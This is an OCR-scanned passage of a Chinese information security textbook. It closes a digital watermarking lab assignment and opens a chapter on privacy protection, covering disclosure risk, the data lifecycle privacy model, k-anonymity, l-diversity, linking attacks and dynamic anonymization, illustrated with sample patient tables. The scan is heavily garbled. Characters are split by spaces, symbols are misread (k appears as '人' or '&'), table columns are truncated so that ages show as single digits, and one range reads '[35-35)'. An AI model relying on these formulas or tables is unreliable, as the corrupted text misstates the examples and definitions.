(1) 实 验 过 程 一 一 绘制 程序 流程 图 ,记录 实验 中 过 到 的 问题 及 解决 方法 。 

(2) 实 验 数据 记录 一 一 记录 载体 图 像 旋 转 、 缩 放 、 加 品 后 的 结果 ; 记录 进行 旋转 、 缩 放 、 
加 品 后 含水 印 的 载体 图 像 以 及 提取 出 的 水 印 图 像 。 

(3) 数据 处 理 分 析 一 一 计算 攻击 后 含水 印 图 像 提取 出 的 水 印 图 像 与 原始 水 印 图 像 的 汉 
明 距 离 ,比较 两 者 图 像 相 似 性 ,确定 攻击 阔 值 。 

(4) 实验 结果 总 结 一 一 从 不 可 见 性 和 重 棒 性 两 方面 对 比 盲 水 印 和 明 水 印 , 总 结 不 同 图 
像 水 印 嵌 入 提取 算法 的 优 缺 点 以 及 适用 的 具体 工程 类 型 。 

(5) 创新 性 一 一 针对 思考 题 提出 问题 的 解决 方法 以 及 实现 程度 。( 可 选 做 ) 


【考核 要 求 与 方法 】 


(1) 程序 运行 : 考核 图 像 水 印 不 可 见 性 和 和 鲁 棒 性 性 能 指标 的 完成 程度 。 初 级 要 求 是 能 
够 独立 实现 在 载体 图 像 嵌 入 水 印 图 像 , 从 旋转 、 缩 放 \ 加 噪 攻击 后 含水 印 图 像 中 正确 提取 出 
的 水 印 图 像 ,合理 选择 攻击 阔 值 ; 中 级 要 求 是 能 够 从 其 他 同学 进行 旋转 、 缩 放 、 加 噪 攻 击 后 
含水 印 载体 图 像 中 正确 提取 出 的 水 印 图 像 ; 高 级 要 求 是 能 够 解决 至 少 两 个 思考 题 中 提出 的 
问题 ,给 出 具体 实现 结果 。 

(2) 实验 报告 : 实验 报告 的 规范 性 与 完整 性 。 

(3) 自主 创新 : 自主 思考 与 独立 实践 能 力 。 根 据 学 生 解 决 思考 题 方 法 的 可 行 性 和 实现 
程度 考核 。( 可 选 做 ) 
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【实验 特色 】 


(1) 实验 来 源 于 数字 图 像 版 权 保护 实际 工程 项 目 ,综合 了 信息 安全 、 图 像 处 理 , 编 程 语 
言 等 多 门 课程 知识 ,编程 语言 不 限 , 水 印 戏 入 提取 方法 具有 多 种 选择 ,具有 良好 的 扩充 性 。 

(2) 学 生 可 以 直观 地 观察 到 实验 结果 ,具有 趣味 性 ; 思考 题 渐进 地 提高 实验 难度 ,可 培 
养 学 生 自 主 探索 解决 问题 方法 的 能 力 , 有 效 地 激发 学 生 的 创新 意识 。 

(3) 提取 其 他 同学 嵌入 水 印 的 实验 内 容 具 有 攻防 性 和 挑战 性 ,使 学 生 具 有 成 就 感 。 


第 9 音 隐私 保护 


本 章 学 习 要 求 

@ 掌握 个 人 隐私 度量 方法 、 数 据 生 命 周期 隐私 保护 模型 

4 掌握 人 -匿名 技术 ,认识 数据 发 布 隐私 保护 技术 ; 

4 掌握 同 态 加 密 解 密 算 法 ,认识 数据 存储 隐私 保护 技术 ; 

4 掌握 使 用 变换 方法 实现 关联 规则 隐私 保护 ,认识 数据 挖 气 隐 私 保护 技术 ; 
4 掌握 基于 场景 的 灵活 隐私 保护 流程 ,认识 数据 访问 控制 技术 。 


9.1 隐私 概述 


9.1.1 隐私 度量 


隐私 可 简单 描述 为 : 隐私 = 二 (信息 本 体 十 属性 )X 时 间 X 地 点 X 使 用 对 象 。 信 息 本 体 就 
是 拥有 隐私 的 用 户 ,隐私 以 信息 本 体 和 属性 为 基础 ,包含 时 间 、 地 点 、 来 源 和 使 用 对 象 等 多 个 
因素 。 

为 了 更 好 地 管理 隐私 以 及 进行 隐私 计算 ,明确 在 何 种 情况 下 数据 发 布 者 .数据 存储 方 以 
及 数据 使 用 者 对 哪些 隐私 数据 进行 保护 ,需要 对 隐私 数据 进行 量化 。 

在 隐私 数据 的 量化 过 程 中 ,需要 综合 考虑 用 户 的 属性 ,行为 .数据 的 属性 ,传播 途径 、 利 
用 方式 等 因素 ,并 对 隐私 数据 的 计算 和 变更 有 很 好 的 支撑 。 

在 隐私 数据 的 整个 生命 周期 中 ,都 必须 对 隐私 数据 进行 准确 描述 和 量化 ,才能 全 面 地 保 
护 隐私 数据 。 通 常 从 披露 风险 和 信息 缺损 两 个 角度 对 隐私 保护 的 效果 进行 度量 。 

1. 披露 风险 

隐私 数据 的 保护 效果 是 通过 攻击 者 披露 隐私 的 多 寡 来 侧面 反映 的 。 现 有 的 隐私 度量 都 
可 以 统一 用 披露 风险 (disclosure risk) 来 描述 。 披 露 风险 表示 为 攻击 者 根据 所 发 布 的 数据 
和 其 他 背景 知识 (back ground know ledge) 可 能 披露 隐私 的 概率 。 通 常 关于 隐私 数据 的 背 
景 知 识 越 多 ,披露 风险 越 大 。 

若 * 表示 敏感 数据 ,事件 S; 表示 攻击 者 在 背景 知识 & 的 帮助 下 揭露 敏感 数据 *, 则 披露 
风险 r(s,k) 二 =P,(Si)。 

对 数据 集 而 言 , 若 数 据 所 有 者 最 终 发 布 数 据 集 D 的 所 有 敏感 数据 的 披露 风险 都 小 于 阔 
值 a(aE [0,1]), 则 称 该 数据 集 的 披露 风险 为 a。 

不 做 任何 处 理 所 发 布 数据 集 的 披露 风险 为 1; 当 所 发 布 数据 集 的 披露 风险 为 0 时, 这样 
发 布 的 数据 被 称 为 实现 了 完美 隐私 (perfect privacy)。 完 美 隐私 实现 了 对 隐私 最 大 程度 的 
保护 ,但 由 于 对 攻击 者 先 验 知识 的 假设 本 身 是 不 确定 的 ,因此 实现 对 隐私 的 完美 保护 也 只 在 
具体 假设 特定 场景 下 成 立 , 真 正 的 完美 保护 并 不 存在 。 

静态 数据 发 布 原则 /-diversity 保证 发 布 数据 集 的 披露 风险 小 于 1/1, 动 态 数据 发 布 原则 
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m-Invariance 保证 发 布 数据 集 的 披露 风险 小 于 1/m。 

2. 信息 缺损 

信息 缺损 表示 经 过 隐私 保护 技术 处 理 之 后 原始 数据 的 信息 丢失 量 , 是 针对 发 布 数据 集 
质量 的 一 种 度量 方法 。 一 般 情况 下 ,隐私 保护 技术 需要 遵循 最 小 信息 缺损 原则 ,该 原则 通过 
比较 原始 数据 和 匿名 数据 的 相似 度 来 衡量 隐私 保护 的 效果 。 信 息 缺 损 越 小 ,说 明 发 布 的 数 
据 集 有 效 性 越 高 ,数据 越 有 价值 。 但 是 ,这 种 度量 原则 需要 考虑 准 标识 符 中 每 个 属性 的 每 个 
取 值 的 泛 化 和 隐匿 带 来 的 信息 缺损 ,计算 代价 较 高 ,适用 于 对 单个 属性 进行 度量 。 

另外 ,还 有 一 种 信息 缺损 度量 标准 , 它 要 求 检查 每 条 准 标识 符 记 录 中 每 个 属性 的 取 值 泛 
化 带 来 的 信息 缺损 ,进而 能 够 计算 出 每 条 记录 泛 化 后 的 信息 缺损 ,再 根据 每 条 记录 的 信息 计 
算 整 个 发 布 数据 集 的 信息 缺损 。 


9.1.2 隐私 保护 模型 


1. 隐私 保护 需求 

(1) 匿名 性 。 所 谓 匿名 性 ,就 是 指 在 某 场 景 下 ,使 用 某 一 标识 符 代替 拥有 隐私 用 户 的 特 
殊 身 份 信息 ,将 拥有 隐私 用 户 的 真实 身份 与 在 该 场景 下 产生 的 数据 分 离开 来 ,并 且 使 得 对 于 
服务 提供 方 每 个 拥有 隐私 的 用 户 均 与 其 余 拥有 隐私 的 用 户 一 样 。 

例如 ,人 们 去 商场 购物 时 ,希望 对 于 商家 来 说 只 是 一 名 普通 消费 者 ,商家 无 法 获得 具体 
某 个 消费 者 的 个 人 信息 ; 去 停车 场 停车 时 被 记录 下 车 牌号 码 , 但 是 人 们 并 不 希望 停车 场 了 
解 到 自己 的 违章 记录 ; 在 道路 上 驾车 时 ,不 希望 被 路 边 的 射频 读 写 器 记录 下 行踪 等 。 

(2) 隐私 查询 安全 。 从 个 人 隐私 数据 的 角度 出 发 ,自助 式 智 能 查询 服务 不 可 避免 地 会 
涉及 人 们 的 隐私 数据 ,为 了 防止 非法 窃取 、 恶 意 挖掘 查询 数据 ,就 需要 考虑 在 智能 查询 中 的 
隐私 保护 方法 。 

例如 ,对 于 患 有 慢性 疾病 的 老年 人 ,在 家 中 使 用 远程 传 感 设备 查询 自己 的 身体 状况 时 ， 
既 不 愿意 透露 自己 的 体征 数据 也 不 愿意 该 查询 结果 被 不 法 商贩 利用 进行 恶意 推销 ,从 而 造 
成 对 个 人 隐私 的 侵犯 ; 再 举例 来 说 : 人 们 通过 数字 终端 查询 距离 自己 最 近 的 加 油 站 、 停 车 
场 .电影 院 、 超 市 等 信息 时 ,都 要 用 到 查询 者 的 当前 位 置信 息 ,这 就 会 暴露 了 人 们 的 位 置 
隐私 。 

(3) 隐私 数据 挖掘 安全 。 随 着 人 们 进行 数据 处 理 的 方法 更 加 准确 和 多 样 化 ,商业 部 门 
或 者 研究 机 构 更 多 地 利用 数据 进行 统计 分 析 , 做 出 科学 的 决策 。 同 时 ,社会 中 多 个 不 同 机 构 
之 间 利用 各 自 的 隐私 数据 进行 合作 计算 处 理 的 过 程 中 ,也 会 引发 隐私 保护 问题 。 

例如 ,银行 拥有 储户 的 储蓄 信息 以 及 加 密 的 储户 个 人 信息 ,银行 现在 希望 借助 派出 所 的 
居民 身份 证 系统 ,分 析 储 户 购 买 基金 的 类 型 与 年 龄 之 间 的 关系 ,这 里 储户 的 个 人 信息 和 身份 
证 都 是 隐私 ,因此 在 保护 隐私 的 前 提 下 ,完成 多 方 数据 挖掘 是 隐私 保护 需求 的 一 个 方面 。 

2. 数据 生命 周期 隐私 保护 模型 

在 数据 发 布 .存储 、 挖 掘 和 使 用 的 整个 生命 周期 过 程 中 ,涉及 数据 发 布 者 、 数 据 存储 方 、 
数据 挖掘 者 和 数据 使 用 者 等 多 个 数据 的 用 户 ,每 个 部 分 都 面临 数据 隐私 泄露 风险 ,相应 的 风 
险 防 范 的 技术 如 图 9-1 所 示 。 

(1) 数据 发 布 。 数 据 发 布 者 即 采 集 数 据 和 发 布 数据 的 实体 ,包括 政府 部 门 、 数 据 公司 、 
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网 站 或 者 用 户 等 。 针 对 数据 的 匿名 发 布 技术 包括 匿名 、L-diversity(1- 多 样 性 ) \t-closeness 
匿名 ,个 性 化 匿名 、m-invariance 匿名 、 基 于 角色 构成 的 匿名 等 方法 ,可 以 实现 对 发 布 数据 时 
的 匿名 保护 。 






















































八 生命 周期 面临 的 风险 涉及 技术 
如 何 确保 合适 的 数据 及 合适 的 时 空 融合 的 角色 访问 控制 、 基 于 
数据 使 用 者 数据 使 用 广 一 | 属性 ， 在 合适 的 时 间 和 地 点 ， | 属性 集 加 密 访问 控制 、 基 于 层次 
给 合适 的 用 户 访问 式 属性 集 的 访问 控制 等 
经 过 匿名 等 处 理 后 ， 经 过 数据 主要 包括 基于 数据 失真 和 加 密 的 
数据 挖掘 者 “| 数 | | 数据 挖掘 一 | 关联 、 聚 类 、 分 类 等 数据 挖掘 上 过 | 技术 ， 包 括 数据 变换 、 隐 藏 、 随 
据 方法 后 ， 可 分 析出 隐私 机 扰动 、 平 移 、 翻 转 等 
生 
命 
周 数据 存储 在 不 可 信 的 第 三 方 混合 加 密 技术 、 同 态 加 密 、 基 于 
数据 存储 方 | 期 | | 数据 存储 片 定 | 上 ， 面 临 着 被 第 三 方 偷窥 或 自 | 一 | BLS 短 签名 POR 模 型 、DPDP、 
改 的 风险 Knox 等 
数据 的 发 布 是 动态 的 ， 总 量 巨 全 匿名 ，l-diversity 匿 名 ， 
数据 发 布 者 f「 数据 发布 1 | 大 ， 来源 众多 ， 如 何在 发 布 时 t-closeness 匿 名 、 个 性 化 匿名 、 
ee 高 效 去 掉 用 户 隐私 ， 并 保证 数 | ”| m-invariance 匿 名 、 基 于 角色 构成 
据 可 用 的 匿名 等 




















图 9-1 数据 生命 周期 隐私 保护 模型 


(2) 数据 存储 。 加 密 是 解决 该 问题 的 传统 思路 ,但 随 着 移动 互联 网 的 发 展 , 越 来 越 多 的 
数据 会 被 存储 到 云端 ,用 户 数据 面临 着 被 第 三 方 偷窥 或 者 筑 改 的 风险 。 同 时 由 于 数据 的 查 
询 统计、 分 析 和 计算 等 操作 也 需要 在 云端 进行 ,这 给 传统 加 密 技 术 带 来 了 新 的 挑战 ,发 展 出 
了 同 态 加 密 技术 、 混 合 加 密 技术 等 新 方法 。 

(3) 数据 挖掘 。 数 据 挖掘 者 即 从 发 布 的 数据 中 挖掘 知识 的 人 或 组 织 ,他 们 往往 希望 从 
发 布 的 数据 中 尽 可 能 多 地 分 析 挖 掘 出 有 价值 的 信息 ,这 很 可 能 会 分 析出 用 户 的 隐私 信息 。 
经 过 匿名 等 处 理 后 的 数据 经 过 数据 关联 分 析 、 聚 类 ,分 类 等 数据 挖掘 方法 后 ,依然 可 以 分 析 
出 用 户 的 隐私 。 

针对 数据 挖掘 的 隐私 保护 技术 ,就 是 在 尽 可 能 提高 数据 可 用 性 的 前 提 下 ,研究 更 加 合适 
的 数据 隐藏 技术 ,以 防范 利用 数据 发 掘 方法 引发 的 隐私 泄露 。 现 在 的 主要 技术 包括 基于 数 
据 失真 和 加 密 的 方法 ,比如 数据 变换 、 隐 藏 .随机 扰动 .平移 、 翻 转 等 技术 。 

(4) 数据 使 用 。 数 据 使 用 者 是 访问 和 使 用 数据 以 及 大 数据 中 挖掘 出 信息 的 用 户 , 通 常 
为 企业 和 个 人 ,通过 数据 的 价值 信息 扩大 企业 利润 或 提高 个 人 生活 质量 。 如 何 确保 合适 的 
数据 及 属性 能 够 在 合适 的 时 间 和 地 点 ,给 合适 的 用 户 访 问 和 利用 ,是 大 数据 访问 和 使 用 阶段 
面临 的 主要 风险 。 

为 了 解决 数据 访问 和 使 用 时 的 隐私 泄露 问题 ,现在 的 技术 主要 包括 : 时 空 融合 的 角色 
访问 控制 .基于 属性 集 加 密 访 问 控制 (Attribute-Based Encryption access control, ABE) 、 基 
于 密 文 策略 属性 集 的 加 密 (Cipher text Policy Attribute Set Based Encryption,CP-ASBE)、 
基于 层次 式 属性 集 的 访问 控制 (Hierarchical Attribute Set Based Encryption, HASBE) 
等 技术 。 
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9.2 数据 发 布 隐私 保护 技术 


数据 发 布 隐 私 保 护 (Privacy Preserving Data Publishing, PPDR) 技 术 一 方面 通过 使 用 
匿名 技术 处 理 数据 ,保证 攻击 者 无 法 从 生成 的 匿名 发 布 表 中 识别 出 个 体 信息 ,来 达到 隐私 保 
护 的 目的 ; 另 一 方面 ,发 布 的 匿名 数据 后 续 会 用 于 数据 挖掘 和 分 析 ,需要 最 大 化 发 布 数据 的 
实用 性 ,以 保证 数据 分 析 结 果 的 准确 性 。 因 此 ,技术 的 重点 在 于 如 何平 衡 隐私 保护 与 匿名 数 
据 实用 性 之 间 的 矛盾 。 

数据 发 布 匿 名 需要 在 确保 所 发 布 的 信息 数据 公开 可 用 的 前 提 下 ,隐藏 公开 数据 记录 与 
特定 个 人 之 间 的 对 应 联系 ,从 而 保护 个 人 隐私 。 


9.2.1 静态 匿名 技术 


数据 匿名 化 所 处 理 的 原始 数据 ,如 医疗 数据 、 统 计数 据 等 ,一 般 为 数据 表 形 式 : 表 中 每 
一 条 记录 (或 每 一 行 ) 对 应 一 个 个 人 ,包含 多 个 属性 值 。 这 些 属性 可 以 分 为 3 类 : 

(1) 个 体 标识 属性 (Individually Identifying attribute, 简 称 ID) , 指 能 唯一 标识 单一 个 
体 的 属性 ,比如 姓名 、 身 份 证 号 码 和 手机 号 码 。 

(2) 准 标 识 属性 (Quasi-Identifier attribute, 简 称 QD ,联合 起 来 能 唯一 标识 一 个 人 的 多 
个 属性 ,如 邮编 .生日 ,性别 等 联合 起 来 是 准 标识 符 。QI 可 用 于 表明 数据 保护 的 程度 ,是 链 
接 攻击 使 用 的 属性 。 

统计 人 口 数 据 发 现 ,78% 的 人 可 以 被 属性 组 (出 生日 期 ,邮编 ) 唯 一 确定 。 

(3) 敏感 属性 (SensiTive attribute, 简 称 ST) ,包含 隐私 数据 的 属性 ,例如 疾病 和 收入 。 

表 9-1 中 姓名 是 ID, (性别 ,邮编 ) 构 成 了 准 标 识 属性 组 ,疾病 是 敏感 属性 。 


表 9-1 单一 个 体 对 应 多 个 记录 的 病人 情况 表 




















编 号 姓 名 性 别 邮 编 疾 病 
1 Mike M 10085 Hypertension 
2 Mike M 10085 Hyperlipemia 
3 Emily F 10075 Diabetes 
4 Tim M 10075 Heart 
5 Jane F 10086 Cancer 
6 Ella F 10087 Flu 














PPDR 技术 通过 使 用 匿名 算法 ,遵循 隐私 保护 规则 对 原始 数据 进行 匿名 处 理 , 生 成 匿名 
发 布 表 ,使 得 信息 攻击 者 无 法 从 匿名 表 中 识别 出 个 体 的 隐私 信息 ,以 此 来 保护 个 体 的 隐私 
安全 

最 初 ,服务 方 仅 简单 删除 个 体 标识 属性 作为 匿名 实现 方案 。 但 实践 表明 ,这 种 匿名 处 理 
方案 是 不 充分 的 ,隐私 信息 仍然 有 可 能 被 推理 获得 ,因为 某 些 准 标识 属性 组 的 取 值 是 唯一 
的 。 例 如 表 9-1 删除 姓名 字段 后 , 仍 可 以 根据 属性 组 (性 别 , 邮 编 ) 推 断 出 某 个 男人 同时 患 有 
高 血压 (hypertension) 和 高 血脂 (hyperlipemiay) 。 
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匿名 化 的 目标 在 于 对 原始 数据 表 进 行 匿名 操作 ,生成 一 个 匿名 的 发 布 表 了 , 表 中 记录 的 
QI 属性 在 匿名 操作 之 后 对 应 多 条 记录 ,使 表 中 记录 不 能 被 攻击 者 唯一 地 识别 出 来 ,满足 了 
隐私 保护 模型 的 要 求 。 

最 常用 的 匿名 技术 是 泛 化 和 属性 分 割 。 

泛 化 的 基本 原理 是 将 记录 分 成 若干 组 ,把 每 一 组 的 属性 值 进行 抽象 处 理 , 使 得 组 中 所 有 
个 体 的 信息 相同 ,进而 实现 隐私 保护 规则 。 

直观 地 讲 , 泛 化 就 是 把 较为 准确 的 取 值 蔡 换 为 较为 概要 的 取 值 ,例如 把 出 生日 期 2017 年 
5 月 20 日 替换 为 2017 年 5 月 ,或 者 进一步 替换 为 2017 年 。 

现 有 的 匿名 模型 ,通常 先 删除 个 体 身份 属性 ,保留 用 于 数据 分 析 的 敏感 属性 ,然后 泛 化 
准 标识 属性 来 满足 匿名 要 求 。 最 终生 成 的 发 布 模型 如 下 : 

T(CQI ,敏感 属性 ) 
其 中 ,QI' 是 原始 属性 的 匿名 化 版 本 ,通过 PPDR 对 原始 表 中 的 QI 进行 匿名 化 操作 生成 。 
当 个 体 通过 QI 属性 被 连接 到 一 个 记录 时 ,会 同时 被 连接 到 拥有 同样 QI 的 其 他 记录 ,造成 
连接 结果 变 得 模糊 不 清 , 进 而 无 法 识别 出 个 体 记 录 及 敏感 信息 。 

1. kk- 匿 名 

k- 匿 名 规则 : 如 果 一 个 记录 在 表 中 的 QI 值 为 gdi ,那么 至 少 还 要 有 一 1 个 记录 的 QI 值 
为 g;。 也 就 是 说 ,如 果 将 具有 相同 QI 值 的 记录 分 为 一 组 ,那么 每 个 组 内 的 个 体 数 最 少 为 &。 
满足 上 述 要 求 的 表 被 称 为 上 -匿名 表 。 在 人 -匿名 表 中 ,通过 表 中 QI 与 其 他 数据 源 连接 ,将 目 
标 个 体 识别 出 来 的 可 能 性 最 多 是 1/k。 

&- 匿 名 技术 就 是 每 个 等 价 组 中 的 记录 个 数 为 & 个 , 即 针对 数据 攻击 者 在 进行 链接 攻击 
时 ,对 于 任意 一 条 记录 的 攻击 都 会 同时 关联 到 等 价 组 中 的 其 他 & 一 1 条 记录 。 这 种 特性 使 得 
攻击 者 在 进行 链接 攻击 时 至 少将 无 法 区 分 等 价 组 中 的 条 数据 记录 ,攻击 者 无 法 确定 与 特 
定 用 户 相 关 的 记录 ,从 而 保护 了 用 户 的 隐私 。 

Samarati 和 Sweeney 提出 的 匿名 原则 要 求 所 发 布 的 数据 表 中 的 每 一 条 记录 不 能 区 分 于 
其 他 一 1 条 记录 。 我 们 称 不 能 相互 区 分 的 & 条 记录 为 一 个 等 价 类 (equivalence class)。 这 里 的 
不 能 区 分 只 对 非 敏 感 属性 项 而 言 。 一 般 值 越 大 ,对 隐私 的 保护 效果 更 好 ,但 丢失 的 信息 
越 多 。 

对 表 9-1, 如 果 我 们 要 求 2- 匿 名 ,那么 前 2 行 就 可 以 构成 一 个 QI 分 组 ; 元 组 3 和 元 组 4 通 
过 泛 化 性 别 属性 组 成 了 一 个 QI 分 组 ; 元 组 5 和 元 组 6 通过 泛 化 邮编 属性 构成 了 一 个 QI 分 
组 。 这 样 得 到 了 匿名 结果 表 9-2 ,每 个 QI 分 组 中 都 有 两 个 元 组 ,从 而 满足 了 2- 匿 名 (事实 上 ,如 
果 按 照 2- 多 样 化 模型 , 表 9-2 同样 满足 了 2- 多 样 化 的 原则 ) 。 


表 9-2 泛 化 匿名 处 理 后 的 表 























组 号 Sex 了 Postcode Disease 
1 M 10085 Hypertension 
1 M 10085 Hyperlipemia 
2 基 10075 Diabetes 
2 关 10075 Heart 
3 F 1008* Cancer 
3 F 1008* Flu 
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表 9-2 满足 2- 匿 名 的 原则 , 即 等 价 类 中 每 一 条 数据 不 能 和 另 一 条 数据 相 区 分 。 这 时 如 
果 我 们 要 攻击 邮编 为 10075 的 QI 分 组 就 关联 到 元 组 3 和 元 组 4 两 个 数据 , 仅 根 据 邮 编 属性 
无 法 区 分 两 者 。 

和 &- 匿 名 的 缺陷 在 于 没有 对 敏感 数据 做 任何 约束 ,攻击 者 可 以 利用 一 致 性 攻击 
(homogeneity attack) 和 背景 知识 攻击 (background knowledge attack) 来 确认 敏感 数据 与 个 
人 的 联系 ,从 而 导致 隐私 泄露 。 

若 等 价 类 在 敏感 属性 上 取 值 单一 ,即使 无 法 获取 特定 用 户 的 记录 ,攻击 者 仍然 可 以 获得 
目标 用 户 的 隐私 信息 。 为 此 ,研究 者 提出 了 /-diversity 匿名 策略 。/-diversity 保证 每 一 个 等 
价 类 的 敏感 属性 至 少 有 /个 不 同 的 值 ,1-diversity 使 得 攻击 者 最 多 以 1/1 的 概率 确认 某 个 个 
体 的 敏感 信息 。 这 使 得 等 价 组 中 敏感 属性 的 取 值 多 样 化 ,从 而 避免 了 -匿名 中 的 敏感 属性 
值 取 值 单一 所 带 来 的 缺陷 。 

显然 表 9-2 发 布 的 数据 也 满足 2-diversity 的 要 求 : 每 一 个 等 价 类 中 至 少 有 2 个 不 同 的 
敏感 属性 值 。 

2. 链接 攻击 

如 果 攻 击 者 能 从 其 他 渠道 获得 包含 了 用 户 标识 符 的 数据 集 , 并 根据 准 标识 符 连 接 多 个 
数据 集 , 重 新 建立 用 户 标 识 符 与 数据 记录 的 对 应 关系 ,他 就 可 以 发 现 敏 感 属性 取 值 ,这 种 攻 
击 称 为 链接 攻击 (linking attack) 。 这 种 攻击 曾 多 次 造成 重大 的 安全 事故 。 

表 9-3 为 某 医院 发 布 的 匿名 病人 记录 表 , 其 中 QI 二 {job,sex,age}) ,disease 为 敏感 属性 。 
表 9-4 为 攻击 者 掌握 的 病人 相关 的 背景 知识 。 通 过 将 表 9-3 中 的 属性 值 与 表 9-4 中 的 值 进 
行 匹配 ,可 以 将 某 些 个体 的 敏感 属性 disease 识别 出 来 ,如 (doug,lawyer,male,38) 通 过 两 表 
的 QI(awyer,male,38) 连 接 , 可 以 识别 出 其 患 有 HIV 。 


表 9-3 某 医 院 发 布 的 病人 记录 表 























Job Sex A Disea 
Engine Male 3 Hepat 
Engine Male 3 Hepat 
Lawye Male 3 HIV 
Writer Female 3 Flu 
Writer Female 3 HIV 
Dancer Female 3 HIV 
Dancer Female 3 HIV 


表 9-4 背景 知识 表 




















N Job Sex A 
A Writer Female 3 
B Engin Male 3 
C Writer Female 3 
D Lawy Male 3 
E Dance Female 3 
F Engin Male 3 
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续 表 
N Job Sex A 
G Dance Female 3 
H Lawy Male 3 
Ir Dance Female 3 











【 例 9-1】 表 9-5 是 一 个 3-anonymity 表 , 由 表 9-3 经 过 对 QI= {job,sex,age} 泛 化 而 
来 。 由 两 个 元 组 组 成 : < professional,male,[35 一 40)>,< artist,female,[30 一 35)>。 每 个 
QI 组 都 至 少 包含 3 个 个 体 , 因 此 表 是 3- 匿 名 表 。 如 果 将 表 9-4 与 表 9-5 通过 QI 连接 起 来 ， 
那么 表 中 的 每 个 记录 与 表 要 么 没有 记录 对 应 ,要么 至 少 有 3 个 记录 对 应 。 

为 了 防御 链接 攻击 ,常见 的 静态 匿名 技术 有 匿名 、l-diversity (1- 多 样 化 ) 匿 名 、t- 
closeness 匿名 以 及 以 它们 的 相关 变形 为 代表 的 匿名 策略 。 这 些 匿名 模型 通常 假定 单一 个 
体 在 数据 表 中 最 多 只 出 现 一 次 。 但 在 实际 环境 中 ,这 个 前 提 可 能 是 难以 满足 的 。 比 如 在 某 
个 医院 发 布 的 病人 情况 表 中 , 某 些 病人 由 于 同时 患 有 不 同 疾病 ,因而 出 现 了 多 次 。 在 表 9-1 
中 ,Mike 同时 患 有 高 血压 和 高 血脂 ,因此 出 现 了 2 次 。 在 表 9-2 中 ,如 果 一 个 攻击 者 发 现 
Mike 出 现在 QI 分 组 1 中 , 则 其 会 推理 Mike 患 有 高 血压 或 者 高 血脂 。 实 际 上 ,此 时 这 两 种 
推测 都 是 正确 的 。 因 此 这 时 的 隐私 泄露 概率 是 100% 。 这 就 是 一 种 发 生 在 单一 个 体 对 应 多 
条 记录 情况 下 的 隐私 保护 程度 的 降低 现象 。 而 且 ,身份 信息 的 删除 丢失 了 同一 个 人 多 个 敏 
感 属 性 之 间 可 能 的 关联 信息 ,而 这 种 信息 在 很 多 研究 中 是 非常 重要 的 ,比如 医疗 中 对 并 发 症 
的 研究 。 





表 9-5 3-anonymity 病人 记录 发 布 表 























Job Sex Age Disease 
Professional Male [35-40) Hepatitis 
Professional Male [35-40) Hepatitis 
Professional Male [35-40) HIV 

Artist Female [35-35) Flu 
Artist Female [35-35) HIV 
Artist Female [35-35) HIV 
Artist Female [35-35) HIV 











属性 分 割 遵 从 1-diversity 等 规则 对 原始 数据 QI 进行 分 组 ,通过 对 每 组 中 的 敏感 属性 
值 进行 置换 操作 ,来 打 乱 QI 与 敏感 属性 间 的 关联 ,QI 与 敏感 属性 由 一 对 一 的 关系 变 为 多 对 
多 ,进而 达到 匿名 保护 的 目的 。 

表 9-6 为 对 原始 数据 表 9-3 经 过 属性 分 割 处 理 生 成 的 2-diversity 匿名 发 布 表 。 表 中 共 
有 两 个 QI 组 ,每 组 中 的 QI 属性 与 敏感 属性 都 保留 了 原始 数据 值 ,划分 为 两 个 集合 并 对 敏 
感 属 性 值 进 置 换 操作 后 ,QI 与 敏感 属性 之 间 的 关联 被 打破 ,以 此 来 防止 连接 攻击 。 如 第 一 
组 中 QI 属性 < engineer,male,35 > 可 能 对 应 敏感 属性 hepatitis, 也 可 能 对 应 HIV ,满足 2- 
diversity 规则 。 
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表 9-6 2-diversity 发 布 表 




















Job Se A Dise 
Eng Male 3 Hepatitis 
Wri Female 3 Hepatitis 
Eng Male 3 HIV 
La Male 要 HIV 
Wri Female 2 HIV 
Dan Female 3 HIV 
Dan Female 3 Flu 














9.2.2 动态 匿名 技术 


数据 发 布 匿名 最 初 只 考虑 了 发 布 后 不 再 变化 的 静态 数据 ,一 旦 数据 集 更 新 ,数据 发 布 者 
便 需 要 重新 发 布 数据 ,以 保证 数据 的 可 用 性 。 此 时 ,攻击 者 可 以 通过 对 不 同 版 本 的 发 布 数 据 
进行 联合 分 析 与 推理 ,上 述 基 于 静态 数据 的 匿名 策略 将 会 失效 。 

针对 数据 持续 更 新 特性 ,研究 者 提出 了 基于 动态 数据 集 的 匿名 策略 ,这些 匿名 策略 不 但 
可 以 保证 每 一 次 发 布 的 数据 都 能 满足 某 种 匿名 标准 ,攻击 者 也 将 无 法 联合 历史 数据 进行 分 
析 与 推理 。 这 些 技术 包括 支持 新 增 的 数据 重 发 布 匿名 技术 .xz-invariance 匿名 技术 .基于 角 
色 构 成 的 匿名 等 支持 数据 动态 更 新 匿名 保护 的 策略 。 

在 连续 发 布 情况 中 ,发布 者 先前 已 发 布 过 TT、T,、…… 、T,-1, 现 需要 发 布 T,,T, 是 
Ti! 经 过 添加 以 及 删除 记录 后 更 新 的 发 布 表 。 假 设 攻击 者 拥有 背景 知识 , 即 知道 每 个 表 的 
发 布 时 间 以 及 个 体 的 QI, 也 就 是 说 ,攻击 者 掌握 了 目标 个 体 所 有 的 发 布 表 。 尽 管 每 个 发 布 
表 Ti、Ts 、T， 是 单独 匿名 发 布 的 ,但 是 通过 将 不 同 的 发 布 表 相 比较 ,消除 个 体 敏 感 属 
性 的 可 能 取 值 ,攻击 者 经 过 推理 有 可 能 会 识别 出 目标 个 体 的 记录 。 

例如 , 某 医院 每 个 季度 发 布 一 次 病人 的 诊断 记录 信息 。 表 9-7a、 表 9-7b、 表 9-8a、 表 9-8b 
分 别 为 某 医院 数据 库 第 一 .二 季度 的 病人 原始 信息 以 及 发 布 信息 表 。 表 9-8a 与 表 9-7a 相 比 
有 5 条 旧 记 录 被 删除 ,增加 了 5 条 新 记录 。 

尽管 两 个 发 布 表 都 遵循 2- 匿 名 或 2-diversity 原则 ,但 是 攻击 者 仍然 可 以 通过 将 两 个 发 
布 版 本 对 比 ,进而 识别 出 某 个 病人 的 记录 。 比 如 攻击 者 了 解 到 Bob 在 两 个 季度 中 住院 治 
疗 , 并 知道 其 个 人 信息 ,那么 根据 表 9-7b 可 以 知道 Bob 患 有 Dyspepsia 或 者 Bronchitis, 而 
从 表 9-8b 可 以 知道 Bob 患 有 Dyspepsia 或 者 Gastritis。 将 上 述 知识 结合 起 来 ,攻击 者 可 以 
推断 Bob 一 定 患 有 Dyspepsia。 





表 9-7a 原始 信息 表 T(1) 

















Name Age Sex Zip. Disease 
Bob 21 Male 47 906 Dyspepsia 
Andy 24 Female 47 905 Flu 
